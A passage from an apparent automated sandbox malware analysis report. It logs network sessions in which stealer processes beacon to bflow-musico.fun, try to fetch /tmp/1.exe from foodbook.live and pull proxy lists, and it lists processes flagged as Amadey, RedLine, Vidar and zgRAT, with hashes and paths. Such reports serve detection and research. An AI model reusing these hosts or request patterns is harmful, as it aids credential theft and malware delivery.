                                                                                                                                                                                                                                        Data Ascii: st=s
                                                                                                                                                                                                                                        Jul 13, 2024 07:09:08.015490055 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:09:07 GMT
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                        Refresh: 0; url = Login.php
                                                                                                                                                                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 1 0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        0192.168.2.558984188.114.96.34437516C:\Users\user\AppData\Local\Temp\1000210001\build16666.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-07-13 05:07:08 UTC383OUTPOST /Annie%20E.%20Vinton%20Elementary%20School?heajhvyh=HhGyJapR6QHO0GNqPiJwFkKrnpbzuRzpMpICBW59RiiZWn5BOMbrxA80cyNHFH6KB%2FS9qBjCCf9IE8dNPX1TZw%3D%3D HTTP/1.1
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Edg/125.0.0.
                                                                                                                                                                                                                                        Content-Length: 96
                                                                                                                                                                                                                                        Host: bflow-musico.fun
                                                                                                                                                                                                                                        2024-07-13 05:07:08 UTC96OUTData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 00 2d 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 97 00 a0 a0 a0 ff ff d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                        Data Ascii: -$9e146be9-c76a-4720-bcdb-53011b87bd06
                                                                                                                                                                                                                                        2024-07-13 05:07:08 UTC508INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:08 GMT
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7euHzABh5JtFAkoT5DsDkztSGAr7NalPisaA1LYeS8d7AhqFUk8EQ1Lg6Bz9SoUmeZiJ9FplyHv7Exh3WnIgZInTihu2mePvHt2knHPsEVxsx%2BzxRe9e2DcoAZOYoENDQWQ6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                        CF-RAY: 8a26bf690dea4261-EWR
                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        1192.168.2.55899215.235.80.224437684C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-07-13 05:07:18 UTC48OUTGET /tmp/1.exe HTTP/1.1
                                                                                                                                                                                                                                        Host: foodbook.live
                                                                                                                                                                                                                                        2024-07-13 05:07:18 UTC189INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:07:18 GMT
                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                        2024-07-13 05:07:18 UTC27INData Raw: 31 30 0d 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 10File not found.0


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        2192.168.2.559214104.18.11.54431772C:\Users\user\AppData\Roaming\Microsoft Windows\svchost.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-07-13 05:09:36 UTC159OUTGET /v2/?request=displayproxies&protocol=socks4&timeout=10000&country=all&ssl=all&anonymity=all HTTP/1.1
                                                                                                                                                                                                                                        Host: api.proxyscrape.com
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        2024-07-13 05:09:36 UTC351INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Date: Sat, 13 Jul 2024 05:09:36 GMT
                                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        vary: Accept-Encoding
                                                                                                                                                                                                                                        Cache-Control: no-store
                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                        Age: 128
                                                                                                                                                                                                                                        Last-Modified: Sat, 13 Jul 2024 05:07:28 GMT
                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                        CF-RAY: 8a26c3075dd84294-EWR
                                                                                                                                                                                                                                        2024-07-13 05:09:36 UTC1018INData Raw: 65 62 31 0d 0a 31 37 34 2e 36 34 2e 31 39 39 2e 38 32 3a 34 31 34 35 0d 0a 31 39 38 2e 31 35 37 2e 36 38 2e 34 37 3a 31 33 33 37 0d 0a 32 32 32 2e 31 36 35 2e 32 32 33 2e 31 33 38 3a 34 31 35 34 31 0d 0a 33 31 2e 32 30 30 2e 32 34 32 2e 32 30 31 3a 31 32 31 39 36 0d 0a 34 37 2e 31 32 31 2e 31 38 33 2e 31 30 37 3a 33 31 32 38 0d 0a 34 37 2e 31 32 31 2e 31 38 32 2e 38 38 3a 38 30 38 31 0d 0a 31 39 33 2e 32 30 30 2e 31 35 31 2e 31 35 38 3a 38 31 39 32 0d 0a 38 33 2e 32 33 34 2e 31 34 37 2e 31 36 36 3a 36 33 36 33 0d 0a 31 37 31 2e 32 31 37 2e 36 39 2e 31 31 33 3a 31 30 38 30 30 0d 0a 31 31 33 2e 31 36 31 2e 32 31 30 2e 36 30 3a 34 31 35 33 0d 0a 34 37 2e 31 31 36 2e 32 31 30 2e 31 36 33 3a 38 30 0d 0a 37 32 2e 31 39 35 2e 33 34 2e 34 32 3a 34 31 34 35 0d 0a
                                                                                                                                                                                                                                        Data Ascii: eb1174.64.199.82:4145198.157.68.47:1337222.165.223.138:4154131.200.242.201:1219647.121.183.107:312847.121.182.88:8081193.200.151.158:819283.234.147.166:6363171.217.69.113:10800113.161.210.60:415347.116.210.163:8072.195.34.42:4145
                                                                                                                                                                                                                                        2024-07-13 05:09:36 UTC1369INData Raw: 35 3a 33 39 39 31 38 0d 0a 31 37 37 2e 37 32 2e 38 32 2e 39 3a 35 36 37 38 0d 0a 36 37 2e 34 33 2e 32 33 36 2e 32 30 3a 31 32 37 39 37 0d 0a 38 2e 32 31 33 2e 31 32 38 2e 39 30 3a 38 30 36 30 0d 0a 31 39 32 2e 32 35 32 2e 32 31 34 2e 32 30 3a 31 35 38 36 34 0d 0a 32 30 31 2e 37 31 2e 32 2e 31 37 37 3a 39 39 39 0d 0a 31 30 37 2e 31 38 30 2e 31 30 31 2e 32 32 36 3a 33 37 35 35 32 0d 0a 31 31 37 2e 37 34 2e 36 35 2e 32 30 37 3a 38 30 0d 0a 34 39 2e 32 32 39 2e 33 36 2e 31 37 30 3a 34 31 35 33 0d 0a 37 32 2e 33 37 2e 32 31 36 2e 36 38 3a 34 31 34 35 0d 0a 31 39 30 2e 31 30 39 2e 37 32 2e 32 35 3a 33 33 36 33 33 0d 0a 34 37 2e 39 30 2e 31 36 37 2e 32 37 3a 33 31 32 38 0d 0a 31 34 32 2e 35 34 2e 32 33 35 2e 39 3a 34 31 34 35 0d 0a 34 35 2e 37 39 2e 31 38 39 2e
                                                                                                                                                                                                                                        Data Ascii: 5:39918177.72.82.9:567867.43.236.20:127978.213.128.90:8060192.252.214.20:15864201.71.2.177:999107.180.101.226:37552117.74.65.207:8049.229.36.170:415372.37.216.68:4145190.109.72.25:3363347.90.167.27:3128142.54.235.9:414545.79.189.
                                                                                                                                                                                                                                        2024-07-13 05:09:36 UTC1369INData Raw: 2e 32 34 33 3a 31 30 38 30 0d 0a 31 33 35 2e 31 34 38 2e 31 30 2e 31 36 31 3a 31 39 32 31 32 0d 0a 34 36 2e 38 2e 36 30 2e 32 3a 31 30 38 30 0d 0a 31 34 38 2e 37 32 2e 32 31 32 2e 32 35 32 3a 36 34 37 35 33 0d 0a 37 32 2e 31 30 2e 31 36 30 2e 31 37 32 3a 31 30 34 32 35 0d 0a 31 38 34 2e 31 38 31 2e 32 31 37 2e 32 30 31 3a 34 31 34 35 0d 0a 32 31 32 2e 31 39 2e 31 37 31 2e 34 38 3a 38 30 38 30 0d 0a 31 37 37 2e 33 39 2e 31 39 33 2e 31 30 39 3a 33 31 32 38 0d 0a 31 30 33 2e 35 34 2e 31 34 38 2e 31 38 39 3a 31 30 38 30 0d 0a 32 37 2e 31 32 33 2e 33 2e 31 34 31 3a 34 31 34 35 0d 0a 31 36 32 2e 32 31 34 2e 37 35 2e 32 33 37 3a 32 34 39 34 39 0d 0a 37 32 2e 31 39 35 2e 33 34 2e 35 38 3a 34 31 34 35 0d 0a 31 39 37 2e 32 35 31 2e 32 33 36 2e 32 32 36 3a 35 36 37
                                                                                                                                                                                                                                        Data Ascii: .243:1080135.148.10.161:1921246.8.60.2:1080148.72.212.252:6475372.10.160.172:10425184.181.217.201:4145212.19.171.48:8080177.39.193.109:3128103.54.148.189:108027.123.3.141:4145162.214.75.237:2494972.195.34.58:4145197.251.236.226:567
                                                                                                                                                                                                                                        2024-07-13 05:09:36 UTC12INData Raw: 35 35 3a 31 30 31 30 31 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 55:10101
                                                                                                                                                                                                                                        2024-07-13 05:09:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                        Start time:01:05:54
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\mlk3kK6uLZ.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\mlk3kK6uLZ.exe"
                                                                                                                                                                                                                                        Imagebase:0xb0000
                                                                                                                                                                                                                                        File size:1'880'576 bytes
                                                                                                                                                                                                                                        MD5 hash:B85FA0D79D936B8B006C535D006C7F29
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2042832211.00000000000B1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2002501733.0000000004E10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                                                        Start time:01:05:56
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                        Imagebase:0x9c0000
                                                                                                                                                                                                                                        File size:1'880'576 bytes
                                                                                                                                                                                                                                        MD5 hash:B85FA0D79D936B8B006C535D006C7F29
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.4452228796.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2036537353.00000000051A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                        • Detection: 63%, ReversingLabs
                                                                                                                                                                                                                                        • Detection: 72%, Virustotal, Browse
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                                        Start time:01:05:56
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe"
                                                                                                                                                                                                                                        Imagebase:0x9c0000
                                                                                                                                                                                                                                        File size:1'880'576 bytes
                                                                                                                                                                                                                                        MD5 hash:B85FA0D79D936B8B006C535D006C7F29
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.2036875774.0000000004B30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2077451585.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                                                        Start time:01:06:02
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1000160001\leg222.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1000160001\leg222.exe"
                                                                                                                                                                                                                                        Imagebase:0xaa0000
                                                                                                                                                                                                                                        File size:1'143'296 bytes
                                                                                                                                                                                                                                        MD5 hash:5486FD5B8200F34B23F23A21F8912ADE
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                        • Detection: 92%, ReversingLabs
                                                                                                                                                                                                                                        • Detection: 82%, Virustotal, Browse
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                                        Start time:01:06:04
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                        Imagebase:0x530000
                                                                                                                                                                                                                                        File size:65'440 bytes
                                                                                                                                                                                                                                        MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000002.2098178516.0000000000479000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.2098178516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                                        Start time:01:06:04
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                                                        Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                                        Start time:01:06:04
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 6472 -ip 6472
                                                                                                                                                                                                                                        Imagebase:0x1b0000
                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                                        Start time:01:06:04
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 284
                                                                                                                                                                                                                                        Imagebase:0x1b0000
                                                                                                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                                        Start time:01:06:04
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\Z73fDV6g4L.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\Z73fDV6g4L.exe"
                                                                                                                                                                                                                                        Imagebase:0xaa0000
                                                                                                                                                                                                                                        File size:390'144 bytes
                                                                                                                                                                                                                                        MD5 hash:1B75671FB234AE1FB72406A317FA752A
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000000.2094530359.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exe, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exe, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exe, Author: ditekSHen
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                        • Detection: 64%, ReversingLabs
                                                                                                                                                                                                                                        • Detection: 45%, Virustotal, Browse
                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                                        Start time:01:06:04
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                                        Start time:01:06:04
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\VP2pdCInvS.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\VP2pdCInvS.exe"
                                                                                                                                                                                                                                        Imagebase:0x890000
                                                                                                                                                                                                                                        File size:311'296 bytes
                                                                                                                                                                                                                                        MD5 hash:15A7CAE61788E4718D3C33ABB7BE6436
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000000.2095785467.0000000000892000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2231034006.0000000002DD4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exe, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                                                        • Detection: 71%, ReversingLabs
                                                                                                                                                                                                                                        • Detection: 82%, Virustotal, Browse
                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                                        Start time:01:06:04
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                        Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                                        Start time:01:06:05
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                                                                        Start time:01:06:16
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                                                                                                                        Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:18
                                                                                                                                                                                                                                        Start time:01:07:01
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\1000202001\hello.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\1000202001\hello.exe"
                                                                                                                                                                                                                                        Imagebase:0xee0000
                                                                                                                                                                                                                                        File size:1'115'648 bytes
                                                                                                                                                                                                                                        MD5 hash:2EB71684C81D24144953FE0F6F5B392C
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000012.00000002.2679727829.000000006C3A3000.00000004.00000001.01000000.00000014.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000012.00000002.2679727829.000000006C3A3000.00000004.00000001.01000000.00000014.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:19
                                                                                                                                                                                                                                        Start time:01:07:02
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                        Target ID:20
                                                                                                                                                                                                                                        Start time:01:07:02
                                                                                                                                                                                                                                        Start date:13/07/2024
                                                                                                                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
